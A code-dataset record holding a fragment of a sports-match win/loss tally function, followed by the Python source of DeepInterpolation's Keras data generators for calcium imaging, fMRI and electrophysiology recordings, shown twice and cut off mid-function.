for m, red, blue in matches:
teams.update(red.teams)
teams.update(blue.teams)
high_scores = {t: 0 for t in teams}
wlt = {t: [0, 0, 0] for t in teams}
def update_wlt(wlt, idx, teams):
for team in teams:
wlt[team][idx] += 1
for m, red, blue in matches:
if m.comp_level != 'q':
continue
for team in red.teams:
if high_scores[team] < red.total:
high_scores[team] = red.total
for team in blue.teams:
if high_scores[team] < blue.total:
high_scores[team] = blue.total
if m.winner == 'red':
ridx, bidx = 0, 1
elif m.winner == 'blue':
ridx, bidx = 1, 0
else:
ridx, bidx = 1, 1
update_wlt(wlt, ridx, red.teams)
update_wlt(wlt, bidx, blue.teams)
return high_scores, wlt
| 3,654 | 0 | 130 |
6a73b83c877297fb609627c070518c8f93ebfd7a | 38,276 | py | Python | deepinterpolation/generator_collection.py | sakuroki/deepinterpolation | 0b08cfbbdb02eec6d2bc2badfd007070fc020bc7 | [
"Unlicense"
] | null | null | null | deepinterpolation/generator_collection.py | sakuroki/deepinterpolation | 0b08cfbbdb02eec6d2bc2badfd007070fc020bc7 | [
"Unlicense"
] | null | null | null | deepinterpolation/generator_collection.py | sakuroki/deepinterpolation | 0b08cfbbdb02eec6d2bc2badfd007070fc020bc7 | [
"Unlicense"
] | null | null | null | # Class to generate data for training
import numpy as np
import json
import h5py
import os
import tensorflow.keras as keras
from deepinterpolation.generic import JsonLoader
import tifffile
import nibabel as nib
from scipy.io import wavfile
import s3fs
class DeepGenerator(keras.utils.Sequence):
"""
This class instantiante the basic Generator Sequence object from which all Deep Interpolation generator should be generated.
Parameters:
json_path: a path to the json file used to parametrize the generator
Returns:
None
"""
def get_input_size(self):
"""
This function returns the input size of the generator, excluding the batching dimension
Parameters:
None
Returns:
tuple: list of integer size of input array, excluding the batching dimension
"""
local_obj = self.__getitem__(0)[0]
return local_obj.shape[1:]
def get_output_size(self):
"""
This function returns the output size of the generator, excluding the batching dimension
Parameters:
None
Returns:
tuple: list of integer size of output array, excluding the batching dimension
"""
local_obj = self.__getitem__(0)[1]
return local_obj.shape[1:]
def __get_norm_parameters__(self, idx):
"""
This function returns the normalization parameters of the generator. This can potentially be different for each data sample
Parameters:
idx index of the sample
Returns:
local_mean
local_std
"""
local_mean = self.local_mean
local_std = self.local_std
return local_mean, local_std
class OnePGenerator(DeepGenerator):
"""
This generator deliver data provided from an hdf5 file made
from one photon miniscope data.
Parameters:
str: json_path: path to the json parameter file
Returns:
None
"""
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __data_generation__(self, index_frame):
"Generates data containing batch_size samples"
# local_raw_data = h5py.File(self.raw_data_file, 'r')['1']
input_full = np.zeros(
[1, self.movie_size[1], self.movie_size[2], self.pre_post_frame * 2]
)
output_full = np.zeros([1, self.movie_size[1], self.movie_size[2], 1])
input_index = np.arange(
index_frame - self.pre_post_frame, index_frame + self.pre_post_frame + 1
)
input_index = input_index[input_index != index_frame]
data_img_input = self.local_raw_data[input_index, :, :]
data_img_output = self.local_raw_data[index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (
data_img_input.astype("float") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float") - self.local_mean
) / self.local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
return input_full, output_full
class CollectorGenerator(DeepGenerator):
"This class allows to create a generator of generators for the purpose of training across multiple files"
"All generators must have idendical batch size and input, output size but can be different length"
def __len__(self):
"Denotes the total number of batches"
total_len = 0
for local_generator in self.generator_list:
total_len = total_len + local_generator.__len__()
return total_len
class EphysGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
self.raw_data_file = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_post_frame = self.json_data["pre_post_frame"]
self.pre_post_omission = self.json_data["pre_post_omission"]
self.start_frame = self.json_data["start_frame"]
self.steps_per_epoch = self.json_data["steps_per_epoch"]
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
#self.nb_probes = 384
self.nb_probes = self.json_data["nb_probes"] # modified by sk 2020/11/20
self.raw_data = np.memmap(self.raw_data_file, dtype="int16")
if self.end_frame < 0:
self.img_per_movie = (
int(self.raw_data.size / self.nb_probes)
+ 1
+ self.end_frame
- self.start_frame
- self.pre_post_frame
- self.pre_post_omission
)
elif int(self.raw_data.size / self.nb_probes) < self.end_frame:
self.img_per_movie = (
int(self.raw_data.size / self.nb_probes)
- self.start_frame
- self.pre_post_frame
- self.pre_post_omission
)
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
self.total_frame_per_movie = int(self.raw_data.size / self.nb_probes)
average_nb_samples = 200000
shape = (self.total_frame_per_movie, int(self.nb_probes / 2), 2)
# load it with the correct shape
self.raw_data = np.memmap(self.raw_data_file, dtype="int16", shape=shape)
# Older reshape code, to remove when stable
# Reshape in number of traces
# self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie,
# self.nb_probes))
# Reshape following probes location
# self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie
# int(self.nb_probes/2), 2)
local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
local_data = local_data.astype("float32")
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.epoch_index = 0
self.list_samples = np.arange(
self.start_frame, self.start_frame + self.img_per_movie
)
if "randomize" in self.json_data.keys():
if self.json_data["randomize"] == 1:
np.random.shuffle(self.list_samples)
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __data_generation__(self, index_frame):
"Generates data containing batch_size samples"
# We reorganize to follow true geometry of probe for convolution
input_full = np.zeros(
[1, self.nb_probes, 2, self.pre_post_frame * 2], dtype="float32"
)
output_full = np.zeros([1, self.nb_probes, 2, 1], dtype="float32")
input_index = np.arange(
index_frame - self.pre_post_frame - self.pre_post_omission,
index_frame + self.pre_post_frame + self.pre_post_omission + 1,
)
input_index = input_index[input_index != index_frame]
for index_padding in np.arange(self.pre_post_omission + 1):
input_index = input_index[input_index != index_frame - index_padding]
input_index = input_index[input_index != index_frame + index_padding]
data_img_input = self.raw_data[input_index, :, :]
data_img_output = self.raw_data[index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
data_img_input = (
data_img_input.astype("float32") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float32") - self.local_mean
) / self.local_std
# alternating filling with zeros padding
even = np.arange(0, self.nb_probes, 2)
odd = even + 1
input_full[0, even, 0, :] = data_img_input[:, 0, :]
input_full[0, odd, 1, :] = data_img_input[:, 1, :]
output_full[0, even, 0, 0] = data_img_output[:, 0]
output_full[0, odd, 1, 0] = data_img_output[:, 1]
return input_full, output_full
class SingleTifGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
self.raw_data_file = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_post_frame = self.json_data["pre_post_frame"]
self.pre_post_omission = self.json_data["pre_post_omission"]
self.start_frame = self.json_data["start_frame"]
if "randomize" in self.json_data.keys():
self.randomize = self.json_data["randomize"]
else:
self.randomize = 1
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
with tifffile.TiffFile(self.raw_data_file) as tif:
self.raw_data = tif.asarray()
self.total_frame_per_movie = self.raw_data.shape[0]
if self.end_frame < 0:
self.img_per_movie = (
self.total_frame_per_movie + 1 + self.end_frame - self.start_frame
)
elif self.total_frame_per_movie < self.end_frame:
self.img_per_movie = self.total_frame_per_movie + 1 - self.start_frame
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
average_nb_samples = 1000
local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
local_data = local_data.astype("float32")
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.list_samples = np.arange(
self.pre_post_frame + self.pre_post_omission + self.start_frame,
self.start_frame
+ self.img_per_movie
- self.pre_post_frame
- self.pre_post_omission,
)
if self.randomize:
np.random.shuffle(self.list_samples)
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __data_generation__(self, index_frame):
# X : (n_samples, *dim, n_channels)
"Generates data containing batch_size samples"
input_full = np.zeros(
[
1,
self.raw_data.shape[1],
self.raw_data.shape[2],
self.pre_post_frame * 2,
],
dtype="float32",
)
output_full = np.zeros(
[1, self.raw_data.shape[1], self.raw_data.shape[2], 1], dtype="float32"
)
input_index = np.arange(
index_frame - self.pre_post_frame - self.pre_post_omission,
index_frame + self.pre_post_frame + self.pre_post_omission + 1,
)
input_index = input_index[input_index != index_frame]
for index_padding in np.arange(self.pre_post_omission + 1):
input_index = input_index[input_index != index_frame - index_padding]
input_index = input_index[input_index != index_frame + index_padding]
data_img_input = self.raw_data[input_index, :, :]
data_img_output = self.raw_data[index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (
data_img_input.astype("float32") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float32") - self.local_mean
) / self.local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
return input_full, output_full
class OphysGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
if "from_s3" in self.json_data.keys():
self.from_s3 = self.json_data["from_s3"]
else:
self.from_s3 = False
self.raw_data_file = self.json_data["movie_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_frame = self.json_data["pre_frame"]
self.post_frame = self.json_data["post_frame"]
self.start_frame = self.json_data["start_frame"]
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
# This is used to limit the total number of samples
# -1 means to take all and is the default fall back
if "total_samples" in self.json_data.keys():
self.total_samples = self.json_data["total_samples"]
else:
self.total_samples = -1
if self.from_s3:
s3_filesystem = s3fs.S3FileSystem()
raw_data = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')['data']
else:
raw_data = h5py.File(self.raw_data_file, "r")["data"]
self.total_frame_per_movie = int(raw_data.shape[0])
if self.end_frame < 0:
self.img_per_movie = (
self.total_frame_per_movie
+ 1
+ self.end_frame
- self.start_frame
- self.post_frame
)
elif self.total_frame_per_movie < self.end_frame:
self.img_per_movie = (
self.total_frame_per_movie - self.start_frame - self.post_frame
)
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
average_nb_samples = 1000
local_data = raw_data[0:average_nb_samples, :, :].flatten()
local_data = local_data.astype("float32")
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.list_samples = np.arange(
self.start_frame, self.start_frame + self.img_per_movie
)
if "randomize" in self.json_data.keys():
self.randomize = self.json_data["randomize"]
else:
self.randomize = 1
if self.randomize:
np.random.shuffle(self.list_samples)
# We cut the number of samples if asked to
if self.total_samples>0 and self.total_samples<len(self.list_samples):
self.list_samples = self.list_samples[0:self.total_samples]
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __data_generation__(self, index_frame):
"Generates data containing batch_size samples"
if self.from_s3:
s3_filesystem = s3fs.S3FileSystem()
movie_obj = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')
else:
movie_obj = h5py.File(self.raw_data_file, "r")
input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
output_full = np.zeros([1, 512, 512, 1])
input_index = np.arange(
index_frame - self.pre_frame, index_frame + self.post_frame + 1,
)
input_index = input_index[input_index != index_frame]
data_img_input = movie_obj["data"][input_index, :, :]
data_img_output = movie_obj["data"][index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (
data_img_input.astype("float") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float") - self.local_mean
) / self.local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
movie_obj.close()
return input_full, output_full
class MovieJSONGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
self.sample_data_path_json = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.steps_per_epoch = self.json_data["steps_per_epoch"]
self.epoch_index = 0
# The following is to be backward compatible
if "pre_frame" in self.json_data.keys():
self.pre_frame = self.json_data["pre_frame"]
else:
self.pre_frame = self.json_data["pre_post_frame"]
if "post_frame" in self.json_data.keys():
self.post_frame = self.json_data["post_frame"]
else:
self.post_frame = self.json_data["pre_post_frame"]
with open(self.sample_data_path_json, "r") as json_handle:
self.frame_data_location = json.load(json_handle)
self.lims_id = list(self.frame_data_location.keys())
self.nb_lims = len(self.lims_id)
self.img_per_movie = len(self.frame_data_location[self.lims_id[0]]["frames"])
def __len__(self):
"Denotes the total number of batches"
return int(np.ceil(float(self.nb_lims * self.img_per_movie) / self.batch_size))
def __data_generation__(self, index_frame):
# X : (n_samples, *dim, n_channels)
"Generates data containing batch_size samples"
try:
local_lims, local_img = self.get_lims_id_sample_from_index(index_frame)
# Initialization
local_path = self.frame_data_location[local_lims]["path"]
_filenames = ["motion_corrected_video.h5", "concat_31Hz_0.h5"]
motion_path = []
for _filename in _filenames:
_filepath = os.path.join(local_path, "processed", _filename)
if os.path.exists(_filepath) and not os.path.islink(
_filepath
): # Path exists and is not symbolic
motion_path = _filepath
break
movie_obj = h5py.File(motion_path, "r")
output_frame = self.frame_data_location[local_lims]["frames"][local_img]
local_mean = self.frame_data_location[local_lims]["mean"]
local_std = self.frame_data_location[local_lims]["std"]
input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
output_full = np.zeros([1, 512, 512, 1])
input_index = np.arange(
output_frame - self.pre_frame, output_frame + self.post_frame + 1,
)
input_index = input_index[input_index != output_frame]
data_img_input = movie_obj["data"][input_index, :, :]
data_img_output = movie_obj["data"][output_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (data_img_input.astype("float") - local_mean) / local_std
data_img_output = (data_img_output.astype("float") - local_mean) / local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
movie_obj.close()
return input_full, output_full
except:
print("Issues with " + str(self.lims_id) + " at " + str(output_frame_index))
| 36.143532 | 131 | 0.604844 | # Class to generate data for training
import numpy as np
import json
import h5py
import os
import tensorflow.keras as keras
from deepinterpolation.generic import JsonLoader
import tifffile
import nibabel as nib
from scipy.io import wavfile
import s3fs
class MaxRetryException(Exception):
# This is helper class for EmGenerator
pass
class DeepGenerator(keras.utils.Sequence):
"""
This class instantiante the basic Generator Sequence object from which all Deep Interpolation generator should be generated.
Parameters:
json_path: a path to the json file used to parametrize the generator
Returns:
None
"""
def __init__(self, json_path):
local_json_loader = JsonLoader(json_path)
local_json_loader.load_json()
self.json_data = local_json_loader.json_data
self.local_mean = 1
self.local_std = 1
def get_input_size(self):
"""
This function returns the input size of the generator, excluding the batching dimension
Parameters:
None
Returns:
tuple: list of integer size of input array, excluding the batching dimension
"""
local_obj = self.__getitem__(0)[0]
return local_obj.shape[1:]
def get_output_size(self):
"""
This function returns the output size of the generator, excluding the batching dimension
Parameters:
None
Returns:
tuple: list of integer size of output array, excluding the batching dimension
"""
local_obj = self.__getitem__(0)[1]
return local_obj.shape[1:]
def __len__(self):
return 0
def __getitem__(self, idx):
return [np.array([]), np.array([])]
def __get_norm_parameters__(self, idx):
"""
This function returns the normalization parameters of the generator. This can potentially be different for each data sample
Parameters:
idx index of the sample
Returns:
local_mean
local_std
"""
local_mean = self.local_mean
local_std = self.local_std
return local_mean, local_std
class OnePGenerator(DeepGenerator):
"""
This generator deliver data provided from an hdf5 file made
from one photon miniscope data.
Parameters:
str: json_path: path to the json parameter file
Returns:
None
"""
def __init__(self, json_path):
super().__init__(json_path)
self.raw_data_file = self.json_data["train_path"]
self.pre_post_frame = self.json_data["pre_post_frame"]
self.start_frame = self.json_data["start_frame"]
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
self.raw_data = h5py.File(self.raw_data_file, "r")["1"]
self.movie_size = self.raw_data.shape
if self.end_frame < 0:
self.img_per_movie = (
int(self.raw_data.shape[0]) + 1 + self.end_frame - self.start_frame
)
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
self.local_raw_data = self.raw_data[:, :, :]
list_nan = ~(np.isfinite(self.local_raw_data))
self.local_raw_data[list_nan] = 0
average_nb_samples = 50
self.list_samples = np.arange(
self.pre_post_frame + self.start_frame,
self.start_frame + self.img_per_movie - self.pre_post_frame,
)
np.random.shuffle(self.list_samples)
local_data = self.local_raw_data[0:average_nb_samples, :, :].flatten()
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.batch_size = self.json_data["batch_size"]
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def __getitem__(self, index):
# Generate indexes of the batch
if (index + 1) * self.batch_size > self.img_per_movie:
indexes = np.arange(index * self.batch_size, self.img_per_movie)
else:
indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
shuffle_indexes = self.list_samples[indexes]
input_full = np.zeros(
[
self.batch_size,
self.movie_size[1],
self.movie_size[2],
self.pre_post_frame * 2,
]
)
output_full = np.zeros(
[self.batch_size, self.movie_size[1], self.movie_size[2], 1]
)
for batch_index, frame_index in enumerate(shuffle_indexes):
X, Y = self.__data_generation__(frame_index)
input_full[batch_index, :, :, :] = X
output_full[batch_index, :, :, :] = Y
return input_full, output_full
def __data_generation__(self, index_frame):
"Generates data containing batch_size samples"
# local_raw_data = h5py.File(self.raw_data_file, 'r')['1']
input_full = np.zeros(
[1, self.movie_size[1], self.movie_size[2], self.pre_post_frame * 2]
)
output_full = np.zeros([1, self.movie_size[1], self.movie_size[2], 1])
input_index = np.arange(
index_frame - self.pre_post_frame, index_frame + self.pre_post_frame + 1
)
input_index = input_index[input_index != index_frame]
data_img_input = self.local_raw_data[input_index, :, :]
data_img_output = self.local_raw_data[index_frame, :, :]
data_img_input = np.swapaxes(data_img_input, 1, 2)
data_img_input = np.swapaxes(data_img_input, 0, 2)
img_in_shape = data_img_input.shape
img_out_shape = data_img_output.shape
data_img_input = (
data_img_input.astype("float") - self.local_mean
) / self.local_std
data_img_output = (
data_img_output.astype("float") - self.local_mean
) / self.local_std
input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output
return input_full, output_full
class CollectorGenerator(DeepGenerator):
"This class allows to create a generator of generators for the purpose of training across multiple files"
"All generators must have idendical batch size and input, output size but can be different length"
def __init__(self, generator_list):
self.generator_list = generator_list
self.nb_generator = len(self.generator_list)
self.batch_size = self.generator_list[0].batch_size
self.assign_indexes()
self.shuffle_indexes()
def __len__(self):
"Denotes the total number of batches"
total_len = 0
for local_generator in self.generator_list:
total_len = total_len + local_generator.__len__()
return total_len
def assign_indexes(self):
self.list_samples = []
current_count = 0
for generator_index, local_generator in enumerate(self.generator_list):
local_len = local_generator.__len__()
for index in np.arange(0, local_len):
self.list_samples.append({"generator": generator_index, "index": index})
current_count = current_count + 1
def shuffle_indexes(self):
np.random.shuffle(self.list_samples)
def __getitem__(self, index):
# Generate indexes of the batch
local_index = self.list_samples[index]
local_generator = self.generator_list[local_index["generator"]]
local_generator_index = local_index["index"]
input_full, output_full = local_generator.__getitem__(local_generator_index)
return input_full, output_full
class FmriGenerator(DeepGenerator):
def __init__(self, json_path):
super().__init__(json_path)
self.raw_data_file = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_post_x = self.json_data["pre_post_x"]
self.pre_post_y = self.json_data["pre_post_y"]
self.pre_post_z = self.json_data["pre_post_z"]
self.pre_post_t = self.json_data["pre_post_t"]
self.start_frame = self.json_data["start_frame"]
self.end_frame = self.json_data["end_frame"]
self.total_nb_block = self.json_data["total_nb_block"]
self.steps_per_epoch = self.json_data["steps_per_epoch"]
if "center_omission_size" in self.json_data.keys():
self.center_omission_size = self.json_data["center_omission_size"]
else:
self.center_omission_size = 1
if "single_voxel_output_single" in self.json_data.keys():
self.single_voxel_output_single = self.json_data[
"single_voxel_output_single"
]
else:
self.single_voxel_output_single = True
if "initialize_list" in self.json_data.keys():
self.initialize_list = self.json_data["initialize_list"]
else:
self.initialize_list = 1
# We load the entire data as it fits into memory
self.raw_data = nib.load(self.raw_data_file).get_fdata()
self.data_shape = self.raw_data.shape
middle_vol = np.round(np.array(self.data_shape) / 2).astype("int")
range_middle = np.round(np.array(self.data_shape) / 4).astype("int")
# We take the middle of the volume and time for range estimation to avoid edge effects
local_center_data = self.raw_data[
middle_vol[0] - range_middle[0] : middle_vol[0] + range_middle[0],
middle_vol[1] - range_middle[1] : middle_vol[1] + range_middle[1],
middle_vol[2] - range_middle[2] : middle_vol[2] + range_middle[2],
middle_vol[3] - range_middle[3] : middle_vol[3] + range_middle[3],
]
self.local_mean = np.mean(local_center_data.flatten())
self.local_std = np.std(local_center_data.flatten())
self.epoch_index = 0
if self.initialize_list == 1:
self.x_list = []
self.y_list = []
self.z_list = []
self.t_list = []
filling_array = np.zeros(self.data_shape, dtype=bool)
for index, value in enumerate(range(self.total_nb_block)):
retake = True
print(index)
while retake:
x_local, y_local, z_local, t_local = self.get_random_xyzt()
retake = False
if filling_array[x_local, y_local, z_local, t_local]:
retake = True
filling_array[x_local, y_local, z_local, t_local] = True
self.x_list.append(x_local)
self.y_list.append(y_local)
self.z_list.append(z_local)
self.t_list.append(t_local)
def get_random_xyzt(self):
x_center = np.random.randint(0, self.data_shape[0])
y_center = np.random.randint(0, self.data_shape[1])
z_center = np.random.randint(0, self.data_shape[2])
t_center = np.random.randint(self.start_frame, self.end_frame)
return x_center, y_center, z_center, t_center
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.x_list) / self.batch_size)))
def on_epoch_end(self):
if self.steps_per_epoch * (self.epoch_index + 2) < self.__len__():
self.epoch_index = self.epoch_index + 1
else:
# if we reach the end of the data, we roll over
self.epoch_index = 0
def __getitem__(self, index):
# This is to ensure we are going through the entire data when steps_per_epoch<self.__len__
index = index + self.steps_per_epoch * self.epoch_index
# Generate indexes of the batch
indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
input_full = np.zeros(
[
self.batch_size,
self.pre_post_x * 2 + 1,
self.pre_post_y * 2 + 1,
self.pre_post_z * 2 + 1,
self.pre_post_t * 2 + 1,
],
dtype="float32",
)
if self.single_voxel_output_single:
output_full = np.zeros([self.batch_size, 1, 1, 1, 1], dtype="float32")
else:
output_full = np.zeros(
[
self.batch_size,
self.pre_post_x * 2 + 1,
self.pre_post_y * 2 + 1,
self.pre_post_z * 2 + 1,
1,
],
dtype="float32",
)
for batch_index, sample_index in enumerate(indexes):
local_x = self.x_list[sample_index]
local_y = self.y_list[sample_index]
local_z = self.z_list[sample_index]
local_t = self.t_list[sample_index]
input, output = self.__data_generation__(local_x, local_y, local_z, local_t)
input_full[batch_index, :, :, :, :] = input
output_full[batch_index, :, :, :, :] = output
return input_full, output_full
def __data_generation__(self, local_x, local_y, local_z, local_t):
"Generates data containing batch_size samples"
input_full = np.zeros(
[
1,
self.pre_post_x * 2 + 1,
self.pre_post_y * 2 + 1,
self.pre_post_z * 2 + 1,
self.pre_post_t * 2 + 1,
],
dtype="float32",
)
if self.single_voxel_output_single:
output_full = np.zeros([1, 1, 1, 1, 1], dtype="float32")
else:
output_full = np.zeros(
[
1,
self.pre_post_x * 2 + 1,
self.pre_post_y * 2 + 1,
self.pre_post_z * 2 + 1,
1,
],
dtype="float32",
)
# We cap the x axis when touching the limit of the volume
if local_x - self.pre_post_x < 0:
pre_x = local_x
else:
pre_x = self.pre_post_x
if local_x + self.pre_post_x > self.data_shape[0] - 1:
post_x = self.data_shape[0] - 1 - local_x
else:
post_x = self.pre_post_x
# We cap the y axis when touching the limit of the volume
if local_y - self.pre_post_y < 0:
pre_y = local_y
else:
pre_y = self.pre_post_y
if local_y + self.pre_post_y > self.data_shape[1] - 1:
post_y = self.data_shape[1] - 1 - local_y
else:
post_y = self.pre_post_y
# We cap the z axis when touching the limit of the volume
if local_z - self.pre_post_z < 0:
pre_z = local_z
else:
pre_z = self.pre_post_z
if local_z + self.pre_post_z > self.data_shape[2] - 1:
post_z = self.data_shape[2] - 1 - local_z
else:
post_z = self.pre_post_z
# We cap the t axis when touching the limit of the volume
if local_t - self.pre_post_t < 0:
pre_t = local_t
else:
pre_t = self.pre_post_t
if local_t + self.pre_post_t > self.data_shape[3] - 1:
post_t = self.data_shape[3] - 1 - local_t
else:
post_t = self.pre_post_t
input_full[
0,
(self.pre_post_x - pre_x) : (self.pre_post_x + post_x + 1),
(self.pre_post_y - pre_y) : (self.pre_post_y + post_y + 1),
(self.pre_post_z - pre_z) : (self.pre_post_z + post_z + 1),
(self.pre_post_t - pre_t) : (self.pre_post_t + post_t + 1),
] = self.raw_data[
(local_x - pre_x) : (local_x + post_x + 1),
(local_y - pre_y) : (local_y + post_y + 1),
(local_z - pre_z) : (local_z + post_z + 1),
(local_t - pre_t) : (local_t + post_t + 1),
]
if self.single_voxel_output_single:
output_full[0, 0, 0, 0, 0] = input_full[
0, self.pre_post_x, self.pre_post_y, self.pre_post_z, self.pre_post_t
]
else:
output_full[0, :, :, :, 0] = input_full[0, :, :, :, self.pre_post_t]
# input_full[0, self.pre_post_x, self.pre_post_y, self.pre_post_z, self.pre_post_t] = 0
input_full[
0, self.pre_post_x, self.pre_post_y, self.pre_post_z, self.pre_post_t
] = 0
if self.center_omission_size > 1:
local_hole = self.center_omission_size - 1
input_full[
0,
(self.pre_post_x - local_hole) : (self.pre_post_x + local_hole),
(self.pre_post_y - local_hole) : (self.pre_post_y + local_hole),
(self.pre_post_z - local_hole) : (self.pre_post_z + local_hole),
self.pre_post_t,
] = 0
input_full = (input_full.astype("float32") - self.local_mean) / self.local_std
output_full = (output_full.astype("float32") - self.local_mean) / self.local_std
return input_full, output_full
class EphysGenerator(DeepGenerator):
"Generates data for Keras"
def __init__(self, json_path):
"Initialization"
super().__init__(json_path)
self.raw_data_file = self.json_data["train_path"]
self.batch_size = self.json_data["batch_size"]
self.pre_post_frame = self.json_data["pre_post_frame"]
self.pre_post_omission = self.json_data["pre_post_omission"]
self.start_frame = self.json_data["start_frame"]
self.steps_per_epoch = self.json_data["steps_per_epoch"]
# This is compatible with negative frames
self.end_frame = self.json_data["end_frame"]
#self.nb_probes = 384
self.nb_probes = self.json_data["nb_probes"] # modified by sk 2020/11/20
self.raw_data = np.memmap(self.raw_data_file, dtype="int16")
if self.end_frame < 0:
self.img_per_movie = (
int(self.raw_data.size / self.nb_probes)
+ 1
+ self.end_frame
- self.start_frame
- self.pre_post_frame
- self.pre_post_omission
)
elif int(self.raw_data.size / self.nb_probes) < self.end_frame:
self.img_per_movie = (
int(self.raw_data.size / self.nb_probes)
- self.start_frame
- self.pre_post_frame
- self.pre_post_omission
)
else:
self.img_per_movie = self.end_frame + 1 - self.start_frame
self.total_frame_per_movie = int(self.raw_data.size / self.nb_probes)
average_nb_samples = 200000
shape = (self.total_frame_per_movie, int(self.nb_probes / 2), 2)
# load it with the correct shape
self.raw_data = np.memmap(self.raw_data_file, dtype="int16", shape=shape)
# Older reshape code, to remove when stable
# Reshape in number of traces
# self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie,
# self.nb_probes))
# Reshape following probes location
# self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie
# int(self.nb_probes/2), 2)
local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
local_data = local_data.astype("float32")
self.local_mean = np.mean(local_data)
self.local_std = np.std(local_data)
self.epoch_index = 0
self.list_samples = np.arange(
self.start_frame, self.start_frame + self.img_per_movie
)
if "randomize" in self.json_data.keys():
if self.json_data["randomize"] == 1:
np.random.shuffle(self.list_samples)
def __len__(self):
"Denotes the total number of batches"
return int(np.floor(float(len(self.list_samples)) / self.batch_size))
def on_epoch_end(self):
self.epoch_index = self.epoch_index + 1
def __getitem__(self, index):
# This is to ensure we are going through the entire data when steps_per_epoch<self.__len__
index = index + self.steps_per_epoch * self.epoch_index
# Generate indexes of the batch
if (index + 1) * self.batch_size > self.total_frame_per_movie:
indexes = np.arange(index * self.batch_size, self.img_per_movie)
else:
indexes = np.arange(index * self.batch_size, (index + 1) * self.batch_size)
shuffle_indexes = self.list_samples[indexes]
input_full = np.zeros(
[self.batch_size, int(self.nb_probes), 2, self.pre_post_frame * 2],
dtype="float32",
)
output_full = np.zeros(
[self.batch_size, int(self.nb_probes), 2, 1], dtype="float32"
)
for batch_index, frame_index in enumerate(shuffle_indexes):
X, Y = self.__data_generation__(frame_index)
input_full[batch_index, :, :, :] = X
output_full[batch_index, :, :, :] = Y
return input_full, output_full
def __data_generation__(self, index_frame):
"Generates data containing batch_size samples"
# We reorganize to follow true geometry of probe for convolution
input_full = np.zeros(
[1, self.nb_probes, 2, self.pre_post_frame * 2], dtype="float32"
